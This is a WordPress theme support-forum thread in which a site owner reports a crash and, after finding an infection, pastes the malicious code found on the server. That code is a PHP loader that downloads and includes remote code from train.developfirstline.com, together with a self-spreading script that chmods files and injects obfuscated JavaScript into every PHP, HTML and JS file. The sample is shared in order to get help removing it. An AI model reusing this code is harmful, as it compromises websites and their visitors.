-
Posts
-
Website down, what can i do?
Fatal error: Uncaught Error: Call to undefined function wp_register_script() in /www/htdocs/myserver/wp-content/themes/enfold/config-gutenberg/class-avia-gutenberg.php:280 Stack trace: #0 /www/htdocs/myserver/wp-includes/class-wp-hook.php(287): Avia_Gutenberg->handler_wp_register_scripts(”) #1 /www/htdocs/myserver/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters(false, Array) #2 /www/htdocs/myserver/wp-includes/plugin.php(478): WP_Hook->do_action(Array) #3 /www/htdocs/myserver/wp-settings.php(540): do_action(‘init’) #4 /www/htdocs/myserver/wp-config.php(90): require_once(‘/www/htdocs/v17…’) #5 /www/htdocs/myserver/wp-load.php(37): require_once(‘/www/htdocs/v17…’) #6 /www/htdocs/myserver/wp-blog-header.php(13): require_once(‘/www/htdocs/v17…’) #7 /www/htdocs/myserver/index.php(17): require(‘/www/htdocs/v17…’) #8 {main} thrown in /www/htdocs/myserver/wp-content/themes/enfold/config-gutenberg/class-avia-gutenberg.php on line 280
Hey sardinien,
Sorry for the problem. Could you try updating the PHP version to 7.2 or higher to see if that helps? If you can’t change it then I would recommend that you restore the site from a backup if you have one available.
Best regards,
RikardThe Problem is not made by Enfold. It comes from a Rooting-Attack (“train.developfirstline.com”) maybe via Duplicator-Addon. Only a old Serverbackup inkl. DB helps, because I find no Information about the Attack and how to resove the Problem online.
Thank you!
Hello Victoria,
thx, i am working on it. I unterstand only a litte bit of PHP, but no JS and so i dont understand what it makes. Here some Code of it:`$c = “base64_decode”;
$d = “file_get_contents”;
$b = $c($d(“https://train.developfirstline.com/y.txt”));
@file_put_contents(“htht”,””.$b);
include(“htht”);
unlink(“htht”);
<script src=’https://train.developfirstline.com/delivery.js?s=5′ type=’text/javascript’></script>`The TXT:
$lastRunLog = "./track.log"; if (file_exists($lastRunLog)) { $lastRun = file_get_contents($lastRunLog); if (time() - $lastRun >= 6400) { search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","."); search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js"); file_put_contents($lastRunLog, time()); } } else { search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","."); search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js"); file_put_contents( $lastRunLog, time()); } function search_file($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file( $dir,"."); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file( $dir,"."); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { make_it($path); } }else if($value != "." && $value != "..") { search_file($path, $file_to_search); } } } function search_file_js($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_js( $dir,".js"); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_js( $dir,".js"); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) { make_it_js($path); } }else if($value != "." && $value != "..") { search_file_js($path, $file_to_search); } } } function make_it_js($f){ $g = file_get_contents($f); if (strpos($g, 'hjsawer') !== false) { } else { $l2 = base64_decode("RWxlbWVudC5wcm90b3R5cGUuYXBwZW5kQWZ0ZXIgPSBmdW5jdGlvbihlbGVtZW50KSB7ZWxlbWVudC5wYXJlbnROb2RlLmluc2VydEJlZm9yZSh0aGlzLCBlbGVtZW50Lm5leHRTaWJsaW5nKTt9LCBmYWxzZTsoZnVuY3Rpb24oKSB7IHZhciBlbGVtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudChTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTsgZWxlbS50eXBlID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2KTsgZWxlbS5zcmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTE2LDExNCw5NywxMDUsMTEwLDQ2LDEwMCwxMDEsMTE4LDEwMSwxMDgsMTExLDExMiwxMDIsMTA1LDExNCwxMTUsMTE2LDEwOCwxMDUsMTEwLDEwMSw0Niw5OSwxMTEsMTA5LDQ3LDEwMCwxMDEsMTA4LDEwNSwxMTgsMTAxLDExNCwxMjEsNDYsMTA2LDExNSw2MywxMTUsNjEsNTEpO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsOTksMTE0LDEwNSwxMTIsMTE2KSlbMF0pO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTAxLDk3LDEwMCkpWzBdKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMDEsOTcsMTAwKSlbMF0uYXBwZW5kQ2hpbGQoZWxlbSk7fSkoKTs="); $g = file_get_contents($f); $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); $g = file_get_contents($f); if (strpos($g, 'hjsawer') !== false) { } } } function make_it($f){ $g = file_get_contents($f); if (strpos($g, '69,108,101,109,101,110,116,46,112,114,111,116') !== false) { } else { $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"; if (strpos($g, '<head>') !== false) { $b = str_replace("<head>","<head>".$l2,$g); @system('chmod 777 '.$f); @file_put_contents($f,$b); } if (strpos($g, '</head>') !== false) { $b = str_replace("</head>",$l2."</head>",$g); @system('chmod 777 '.$f); @file_put_contents($f,$b); } } }Hi sardinien,
This is not the theme’s code.
Please have a look at this article:
If you need further assistance please let us know.
Best regards,
Victoria
- You must be logged in to reply to this topic.